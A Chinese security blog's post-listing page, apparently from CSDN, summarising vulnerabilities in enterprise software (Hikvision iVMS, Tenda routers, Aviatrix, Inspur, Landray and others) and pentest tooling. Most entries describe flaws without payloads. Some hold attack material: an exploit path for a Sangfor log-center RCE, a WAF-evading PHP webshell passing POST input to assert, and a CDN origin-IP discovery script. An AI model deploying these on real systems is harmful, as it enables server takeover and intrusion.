- 博客(68)
- 收藏
- 关注
RSS订阅原创 HIKVISION iVMS download.action存在任意文件读取漏洞(DVB-2025-8938)
海康威视iVMS(智能视频管理系统)是一款集视频监控、存储、管理、分析于一体的综合管理平台,广泛应用于安防领域。该产品支持多设备接入,提供实时监控、录像回放、智能分析、报警管理等功能,具备高可靠性和易用性,适用于各类场景如智慧城市、交通、金融、教育等,帮助用户实现高效、智能的安全管理。海康威视iVMS download.action存在任意文件读取漏洞,攻击者可以读取服务器任何文件,获取服务器敏感信息。
2025-03-11 14:45:52
382
原创 百易云资产管理运营系统 feeStandard.Apply.save2.php SQL注入漏洞(DVB-2025-8886)
百易云资产管理运营系统 feeStandard.Apply.save2.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
2025-03-11 14:44:12
200
原创 jsherp importItemExcel接口存在SQL注入
很多人说管伊佳ERP(原名:华夏ERP,英文名:jshERP)是目前人气领先的国产ERP系统虽然目前只有进销存+财务+生产的功能,但后面将会推出ERP的全部功能,有兴趣请帮点一下Star哦jishenghua/jshERP: 管伊佳ERP(原名华夏ERP)基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。
2025-02-20 22:05:02
1164
原创 tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697)
tenda路由器WriteFacMac存在远程命令执行漏洞。
2025-02-12 20:20:17
690
原创 Aviatrix未授权远程代码执行漏洞(CVE-2024-50603)
在 7.1.4191 之前的 Aviatrix Controller 和 7.2.4996 之前的 7.2.x 中发现了问题。由于操作系统命令中使用的特殊元素的中和不当,未经身份验证的攻击者能够执行任意代码。Shell 元字符可以发送到 cloud_type 中的 /v1/api(对于 list_flightpath_destination_instances),或者发送到 src_cloud_type(对于 Flightpath_connection_test)。
2025-02-12 20:15:58
505
原创 浪潮海岳 UploadListFile文件上传致RCE漏洞
浪潮云财务系统的/cwbase/EP/ListContent/UploadListFile.ashx接口存在任意文件上传漏洞,未经身份验证的攻击者可以通过该漏洞上传恶意脚本文件,从而控制目标服务器。
2025-01-16 21:03:19
237
原创 浪潮云财务系统xtdysrv.asmx存在命令执行漏洞
浪潮云财务系统xtdysrv.asmx存在命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码。
2025-01-16 21:00:22
421
原创 W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞
W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞。
2025-01-13 22:22:55
260
原创 九垠赢商业管理系统Common.ashx存在文件上传漏洞
成都和力九垠科技有限公司成立于1999年,是一家专业从事零售业全流程解决方案的高科技公司,总部位于四川成都。多年来,九垠软件不忘初衷,一直致力于中国零售企业的成长与发展,为广大客户提供优秀的零售商业管理软件与优质的金牌售后服务。经过多年的积累与发展,九垠科技已成为中国零售企业管理信息化的领导品牌。九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
2025-01-13 22:05:50
282
原创 灵当CRM系统接口getMyAmbassador存在SQL注入漏洞
灵当CRM系统接口getMyAmbassador存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
2024-12-30 12:21:28
303
原创 灵当CRM系统接口uploadfile文件上传漏洞
灵当CRM系统接口uploadfile文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
2024-12-30 12:20:58
324
原创 博斯外贸管理软件logined.jsp存在SQL注入漏洞
AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术,实时采集企业总用电、生产设备及环保治理设备用电数据,通过关联分析、超限分析、停电分析、停限产分析,结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况,同时通过数据分析还可以实时监控限产和停产整治企业运行状态,用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
2024-12-30 12:18:11
265
原创 安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞
AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术,实时采集企业总用电、生产设备及环保治理设备用电数据,通过关联分析、超限分析、停电分析、停限产分析,结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况,同时通过数据分析还可以实时监控限产和停产整治企业运行状态,用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
2024-12-30 12:17:02
279
原创 勤云远程稿件处理系统存在SQL注入漏洞
勤云远程稿件处理系统 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
2024-12-30 12:16:04
241
原创 赛诸葛数字化智能中台系统login存在SQL注入漏洞
赛诸葛数字化智能中台系统 login 登录接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
2024-12-30 12:15:08
363
转载 网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞
网神SecFox运维安全管理与审计系统 authService接口处使用存在漏洞 fastjson 组件,未授权的攻击者可通过fastjson 序列化漏洞对系统发起攻击获取服务器权限。
2024-12-30 12:13:57
472
原创 # 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞
【代码】# 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞。
2024-12-30 12:11:18
302
原创 月子会所ERP管理云平台GetData.ashx存在SQL注入
月子会所ERP管理云平台 GetData.ashx 接口处存在SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
2024-12-30 12:09:32
271
原创 科汛新职教网校系统CheckOrder存在SQL注入漏洞
科汛新职教网校系统KesionEDU CheckOrder 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
2024-12-30 12:08:27
280
原创 虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞
虹安Heimdall DLP数据泄漏防护系统 pushSetup.do 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
2024-12-30 12:06:42
278
原创 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞
蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。访问save方法,填充一下数据库。
2024-12-30 12:05:32
442
原创 通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600)
pda/appcenter/submenu.php 未包含inc/auth.inc.php且 $appid 参数未用’包裹导致前台SQL注入。
2024-11-21 20:42:32
797
3
原创 明源地产ERP WFWebService.asmx 反序列化RCE漏洞复现
明源地产ERP是一款专为房地产行业设计的企业资源规划(ERP)系统,系统集成了项目管理、财务管理、客户关系管理、营销管理等多个模块,旨在帮助房地产企业提升运营效率、降低成本和提高客户满意度。它充分考虑了房地产行业的特性和需求,通过整合企业的各个业务环节,实现信息的统一管理和高效协同。明源地产ERP WFWebService.asmx 接口处存在反序列化远程代码执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。
2024-11-21 20:36:16
635
原创 明源云ERP报表服务GetErpConfig.aspx接口存在敏感信息泄露
在访问 /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 路径时,返回了包含敏感信息的响应。这些信息包括但不限于数据库连接字符串、用户名、密码、加密密钥等。这些敏感信息的暴露可能导致以下风险:数据库访问风险:攻击者可以利用数据库连接字符串中的用户名和密码直接访问数据库,从而获取或篡改敏感数据。加密风险:攻击者可以利用加密密钥解密或篡改加密数据,导致数据泄露或数据完整性受损。
2024-10-21 22:27:34
612
原创 智联云采 SRM2.0 testService SQL注入漏洞复现
智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。
2024-10-18 22:17:27
384
原创 灵当CRM data pdf.php 任意文件读取漏洞复现
灵当CRM是一款专为中小企业打造的智能客户关系管理工具,由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域,帮助企业实现客户个性化管理需求,提升企业竞争力。无论是新客户开拓、老客户维护,还是销售过程管理、服务管理等方面,灵当CRM都能提供全面、高效的解决方案。灵当CRM data/pdf.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
2024-10-17 22:18:25
325
原创 万户ezEIP企业管理系统 productlist.aspx SQL注入漏洞
万户ezEIP是一种企业资源规划软件,旨在帮助企业管理其各个方面的业务流程。它提供了一套集成的解决方案,涵盖了财务、供应链管理、销售和市场营销、人力资源等各个领域。万户ezEIP企业管理系统 productlist.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
2024-10-17 22:15:14
497
原创 大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞
大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞,未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。
2024-10-17 22:10:08
345
原创 fastjson <=1.2.68 远程代码执行漏洞 学习
fastjson <=1.2.68 远程代码执行漏洞 学习1、 MAC2、Java版本为 1.8.0_261 。3、Mysql版本为 5.7 。我用的是PHPstudy集成的。4、IDEA版本随意。创建一个spring 项目mavcpom.xml引用fastjson创建demo_fastjson.java输出通过前面已经说到如何去利用,所以这里需要寻找一个子类或实现非常多的类或接口都行,在实际中还是主要看checkAutoType方法中,有哪些对象或接口可以通过校验,实际测试中存在如下几种:
2022-06-08 13:59:30
900
转载 VMware 产品多个高危漏洞 (CVE-2022-22954,CVE-2022-22955,CVE-2022-22956,CVE-2022-22957,CVE-2022-22958,CVE-2022
漏洞详情VMware官方发布安全通告告,其中包含了影响VMware Workspace ONE Access、Identity Manager 和 vRealize Automation组件的多个高危漏洞(CVE-2022-22954、CVE-2022-22955、CVE-2022-22956、CVE-2022-22957、CVE-2022-22958、CVE-2022-22959、CVE-2022-22960、CVE-2022-22961),漏洞详情如下:CVE-2022-22954漏洞类型:远程命
2022-04-11 09:20:41
2867
转载 目录扫描之dirsearch工具推荐
dirsearch“ dirsearch”是一种成熟的命令行工具,旨在暴力破解Web服务器中的目录和文件。随着6年的增长,dirsearch现在已成为顶级的Web内容扫描仪。作为功能丰富的工具,dirsearch为用户提供了执行复杂的Web内容发现的机会,其中包含用于单词列表的许多矢量,高精度,令人印象深刻的性能,高级的连接/请求设置,现代的蛮力技术和出色的输出。下载地址:https://github.com/maurosoria/dirsearchdirsearch使用-u 指定网址
2021-07-02 15:42:15
672
原创 绕过cdn方法之ICO图标获取真实IP
绕过cdn方法之–.ICO图标获取真实IP说明:ICO图标获取真实IP,绕过cdn方法操作:python3 编写替换代码中URL运行当前代码在shadan搜索输出的值,就能获取到真实ip地址import mmh3import requestsdef hashget(): response = requests.get('https://www.baidu.com/favicon.ico') favicon = response.content hash = m
2021-07-01 10:14:11
682
原创 深信服行为感知系统&&日志中心 远程命令执行漏洞
标题声明1、该公众号发布文章仅供学习使用。2、请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。漏洞描述深信服行为感知系统&&日志中心 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行影响范围深信服 行为感知系统和日志中心漏洞复现漏洞地址:/tool/log/c.php?strip_slashes=system&host=首页:执行:https://ip/tool/log/c.php?strip_sla
2021-06-07 22:37:31
3192
3
原创 7z控制台命令执行打包文件
环境windos系统7z下载地址:https://www.7-zip.org/download.html操作:提取7z的2个文件,上传至目标服务器压缩地址目录控制台压缩#压缩文件夹##压缩 a 压缩后命名 压缩文件路径7z a test.zip D:\tools\lily5.0\Lily5.0...
2021-05-07 11:22:10
720
原创 python3之读取xlsx列并写入txt文档
# python3#-*- coding:utf-8 _*-import xlrd# 写文件def writendata(data): name='writedemo.txt' w = open(name, 'a', encoding='utf-8') w.write(data + '\n') w.close() print('写入成功')def main2(): name='副本.xlsx' ncint=input('输入需要获取那.
2020-07-14 15:10:20
778
1
原创 php免杀过狗变量覆盖
php免杀过狗变量覆盖<?phpfunction test($d){$a='ab';$ab=$d;echo $$a;$$a($_POST['a']);}test('assert');?>
2020-07-05 00:33:04
3445
原创 PyInstaller生成可执行exe程序
安装Pylnstallerpip install pyinstaller生成exe可执行文件进入需要生成exe的py目录,执行命令生产完成,在当前dist文件夹下pyinstaller 选项 Python 源文件
2020-04-16 09:06:21
208
原创 Nmap
Nmapnmap端口状态解析**open : 应用程序在该端口接收 TCP 连接或者 UDP 报文。closed :关闭的端口对于nmap也是可访问的, 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。filtered :由于包过滤阻止探测报文到达端口,nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备,路由规则 或者主机上的软件防火墙。unfiltered ...
2020-04-13 13:19:48
181
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人